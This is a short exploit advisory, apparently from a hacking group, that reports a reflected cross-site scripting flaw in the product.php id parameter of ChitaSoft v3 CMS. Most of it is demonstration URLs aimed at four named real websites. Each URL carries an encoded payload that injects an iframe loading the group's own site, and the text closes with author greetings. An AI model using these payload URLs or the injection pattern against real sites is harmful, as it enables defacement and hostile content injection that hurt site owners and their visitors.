###################### # Exploit Title : ChitaSoft v3 CMS Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.chitasoft.com/products/3 # Author Homepage : http://www.persian-team.ir # Date: 2016/04/15 # Version : 3 ###################### # PoC: # product.php?id=[XSS] # Payload = '> # Demo: # http://www.javdanesho.com/product.php?id=149%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E # http://www.dafpublishingco.com/product.php?id=121%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E # http://www.nashredaf.com/product.php?id=99%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E # http://www.iranmodiran.com/product.php?id=1%27%3E%3Ciframe%20src=%22http://persian-team.ir%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Greetz : FireKernel And Milad_Hacking # Homepage : http://www.persian-team.ir ######################